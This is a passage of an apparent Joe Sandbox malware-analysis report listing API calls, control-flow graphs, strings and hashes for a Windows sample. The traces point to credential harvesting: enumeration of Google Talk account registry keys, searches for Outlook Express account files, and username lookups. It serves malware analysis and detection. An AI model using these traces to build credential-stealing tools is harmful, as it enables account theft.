                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                      • memset.MSVCRT ref: 00408620
                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                      • memset.MSVCRT ref: 00408671
                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                      Strings
                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                      • API String ID: 1366857005-1079885057
                                                                                      • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                      • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 421 40ba28-40ba3a 422 40ba87-40ba9b call 406c62 421->422 423 40ba3c-40ba52 call 407e20 _mbsicmp 421->423 445 40ba9d call 4107f1 422->445 446 40ba9d call 404734 422->446 447 40ba9d call 404785 422->447 448 40ba9d call 403c16 422->448 449 40ba9d call 410a9c 422->449 428 40ba54-40ba6d call 407e20 423->428 429 40ba7b-40ba85 423->429 434 40ba74 428->434 435 40ba6f-40ba72 428->435 429->422 429->423 430 40baa0-40bab3 call 407e30 438 40bab5-40bac1 430->438 439 40bafa-40bb09 SetCursor 430->439 437 40ba75-40ba76 call 40b5e5 434->437 435->437 437->429 441 40bac3-40bace 438->441 442 40bad8-40baf7 qsort 438->442 441->442 442->439 445->430 446->430 447->430 448->430 449->430
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                      • String ID: /nosort$/sort
                                                                                      • API String ID: 882979914-1578091866
                                                                                      • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                      • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                        • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                        • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                        • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2099061454-0
                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                      • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                      • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                      • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 2152742572-0
                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                      • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                      • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                      APIs
                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75920A60,?,00000000), ref: 00410D1C
                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                      • API String ID: 889583718-2036018995
                                                                                      • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                      • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                      • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                      • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                      • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3143880245-0
                                                                                      • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                      • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                      APIs
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D5C
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D7A
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408D98
                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408DA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1033339047-0
                                                                                      • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                      • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                      • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                      • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 00406F4C
                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,75920A60,00407A43,00000001,?,00000000,75920A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                      • free.MSVCRT ref: 00406F6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 3056473165-0
                                                                                      • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                      • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                      • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                      • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                      APIs
                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFontIndirect_mbscpymemset
                                                                                      • String ID: Arial
                                                                                      • API String ID: 3853255127-493054409
                                                                                      • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                      • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                      • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                      • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                      APIs
                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: strlen$_strcmpimemset
                                                                                      • String ID: /stext
                                                                                      • API String ID: 520177685-3817206916
                                                                                      • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                      • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                      APIs
                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 145871493-0
                                                                                      • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                      • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                      APIs
                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                      • String ID:
                                                                                      • API String ID: 4165544737-0
                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                      APIs
                                                                                      • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3659277113.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3659277113.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3659277113.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
